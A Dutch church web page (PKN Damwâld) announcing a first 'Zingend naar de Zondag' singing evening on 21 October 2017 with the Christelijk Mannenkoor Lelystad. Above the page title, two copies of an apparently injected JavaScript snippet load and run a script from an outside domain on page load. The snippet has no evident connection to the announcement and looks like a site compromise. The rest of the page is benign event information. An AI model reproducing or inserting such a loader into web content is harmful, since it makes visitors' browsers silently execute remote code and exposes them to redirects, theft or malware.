;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uniek in Friesland ... in Damwâld ... zingend naar de zondag ! - PKN Damwâld

Uniek in Friesland … in Damwâld … zingend naar de zondag !

Gepubliceerd op: maandag 18 september 2017

Open deur diensten in Hoogkerk en Doornspijk, Welkom diensten in Drachten en Assen , Zingen naar de Zondag in Stadskanaal, Kampen, Elburg, Hoogeveen, Appingedam en Staphorst, allemaal activiteiten die georganiseerd worden in kerken, meestal in omliggende provincies, maar nu ook in Damwȃld. Het idee was er al enige jaren en nu is het zover. Onze kerk leent zich prima voor dergelijke activiteiten. De kerk willen wij ook meer gaan gebruiken, want door de recente verbouwing kunnen we nu iedereen, u en ook gasten zoals koren, beter ontvangen en verzorgen. Daarom starten wij zaterdagavond 21 oktober 2017 om half acht met “ Zingend naar de Zondag” in de Gereformeerde Kerk, Foarwei 48 in Damwald. Het is bekend, dat het altijd heel geslaagde en gezegende avonden zijn in de genoemde plaatsen en dat de bezoekers er elke keer weer naar uit kijken. Even samen bekende liederen zingen o.a. uit Johannes de Heer en luisteren naar een koor of zanggroep.

Wij hebben het Christelijk Mannenkoor Lelystad uitgenodigd en vastgelegd. Dat bestaat uit ruim 75 enthousiaste leden en heeft als doelstelling om door koorzang bij te dragen aan de verkondiging van het Evangelie. Deze doelstelling is ook de reden om te starten met deze nieuwe activiteit in onze Kerk, nl. meer Evangeliseren en meer mensen op een laagdrempelige manier raken met prachtige koorzang en samenzang. Wij hopen na deze avond nog vaak een soortgelijke avond te organiseren.
Het koor zal diverse keren voor ons optreden met liederen uit hun brede repertoire. Dit prachtige koor staat onder leiding van de bekende dirigent Bert Moll met als vaste organist Harrie Hamer, die ook de samenzang zal begeleiden. Bert Moll is daarnaast dirigent van het Urker Mannenkoor Hallelujah uit Urk, van het Chr. Mannenkoor Con Forza uit Woerden en van de Chr. Koorvereniging Deo Juvante uit Huizen. Hij werd in 2004 koninklijk onderscheiden voor zijn muzikale verdiensten en benoemd tot Lid in de Orde van Oranje Nassau. Het koor werkt mee aan kerkdiensten, radio en televisie opnames en organiseert jaarlijks meerdere concerten. Deze avond, die wordt de avond geleid door de bekende spreker Jan van der Meer uit Oosternijkerk, is er geen meditatie. Hij zal de avond presenteren en u indien nodig iets vertellen over de liederen.

Kortom een avond die u niet mag missen en nu alvast vrij moet houden in uw agenda. De avond is gratis toegankelijk! Wel is er een collecte voor bestrijding van de onkosten. Zoals gezegd, hopen wij deze avonden vaker te organiseren. Uw komst zal dat mogelijk maken!!
Kom daarom naar onze eerste Zingend naar de Zondag in Damwald op 21 oktober 2017.

Voor informatie: Kor en Willy Postma en Koop en Anneke Schaafsma

Foto's